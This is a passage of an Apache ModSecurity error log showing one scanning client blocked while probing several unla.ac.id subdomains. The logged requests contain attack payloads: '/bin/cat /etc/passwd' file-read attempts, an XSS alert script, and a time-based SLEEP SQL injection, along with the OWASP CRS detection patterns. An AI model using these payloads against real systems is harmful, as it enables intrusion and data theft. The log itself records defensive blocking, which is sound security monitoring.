"ZO11JsCo-f0AAARtAA0AAAAV"]
[Tue Aug 29 11:33:42.337712 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/debug.cgi"] [unique_id "ZO11JsCo-f0AAARQ4BYAAAAB"]
[Tue Aug 29 11:33:42.345489 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/debug.cgi"] [unique_id "ZO11JsCo-f0AAANsAkIAAAAD"]
[Tue Aug 29 11:33:42.349697 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/jexws/jexws.jsp"] [unique_id "ZO11JsCo-f0AAARtAA4AAAAV"]
[Tue Aug 29 11:33:43.331374 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/cgi-bin/test-cgi"] [unique_id "ZO11J8Co-f0AAAQKOooAAAAs"]
[Tue Aug 29 11:33:43.360242 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cgi-bin/test-cgi"] [unique_id "ZO11J8Co-f0AAARQ4BoAAAAB"]
[Tue Aug 29 11:33:43.421755 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/cgi-bin/test-cgi"] [unique_id "ZO11J8Co-f0AAARQ4B0AAAAB"]
[Tue Aug 29 11:33:43.436478 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/cgi-bin/test-cgi"] [unique_id "ZO11J8Co-f0AAAQKOo4AAAAs"]
[Tue Aug 29 11:33:43.450972 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/jexws4/jexws4.jsp"] [unique_id "ZO11J8Co-f0AAARjjQcAAAAL"]
[Tue Aug 29 11:33:43.554682 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO11J8Co-f0AAARy-yoAAAAb"]
[Tue Aug 29 11:33:43.605558 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/cgi-bin/test-cgi"] [unique_id "ZO11J8Co-f0AAARQ4CQAAAAB"]
[Tue Aug 29 11:33:44.570928 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/cgi-bin/status"] [unique_id "ZO11KMCo-f0AAAQKOpYAAAAs"]
[Tue Aug 29 11:33:44.572897 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/jexinv4/jexinv4.jsp"] [unique_id "ZO11KMCo-f0AAARy-zIAAAAb"]
[Tue Aug 29 11:33:45.384162 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:topicId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:topicId: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/widgets/knowledgebase"] [unique_id "ZO11KcCo-f0AAANsAk0AAAAD"]
[Tue Aug 29 11:33:45.440189 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:topicId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:topicId: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/widgets/knowledgebase"] [unique_id "ZO11KcCo-f0AAASEJO8AAAAE"]
[Tue Aug 29 11:33:45.444109 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:topicId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:topicId: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/widgets/knowledgebase"] [unique_id "ZO11KcCo-f0AAANsAlAAAAAD"]
[Tue Aug 29 11:33:45.451393 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:topicId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:topicId: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/widgets/knowledgebase"] [unique_id "ZO11KcCo-f0AAARy-zkAAAAb"]
[Tue Aug 29 11:33:45.481667 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:topicId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:topicId: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/widgets/knowledgebase"] [unique_id "ZO11KcCo-f0AAASEJPEAAAAE"]
[Tue Aug 29 11:33:45.502899 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/cgi-bin/stats"] [unique_id "ZO11KcCo-f0AAASEJPIAAAAE"]
[Tue Aug 29 11:33:45.506595 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/jbossass/jbossass.jsp"] [unique_id "ZO11KcCo-f0AAANsAlMAAAAD"]
[Tue Aug 29 11:33:46.317685 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:calendarId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  (5440=5440 found within ARGS:calendarId: 1) AND (SELECT 2065 FROM (SELECT(SLEEP(6)))jtGw) AND (5440=5440"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11KsCo-f0AAARy-z0AAAAb"]
[Tue Aug 29 11:33:46.321507 2023] [:error] [pid 1152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:calendarId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  (5440=5440 found within ARGS:calendarId: 1) AND (SELECT 2065 FROM (SELECT(SLEEP(6)))jtGw) AND (5440=5440"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11KsCo-f0AAASAHc0AAAAH"]
[Tue Aug 29 11:33:46.323580 2023] [:error] [pid 1155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:calendarId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  (5440=5440 found within ARGS:calendarId: 1) AND (SELECT 2065 FROM (SELECT(SLEEP(6)))jtGw) AND (5440=5440"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11KsCo-f0AAASDb58AAAAA"]
[Tue Aug 29 11:33:46.342651 2023] [:error] [pid 1152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:calendarId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  (5440=5440 found within ARGS:calendarId: 1) AND (SELECT 2065 FROM (SELECT(SLEEP(6)))jtGw) AND (5440=5440"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11KsCo-f0AAASAHc4AAAAH"]
[Tue Aug 29 11:33:46.361219 2023] [:error] [pid 1137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/cgi-bin/test"] [unique_id "ZO11KsCo-f0AAARxOrMAAAAa"]
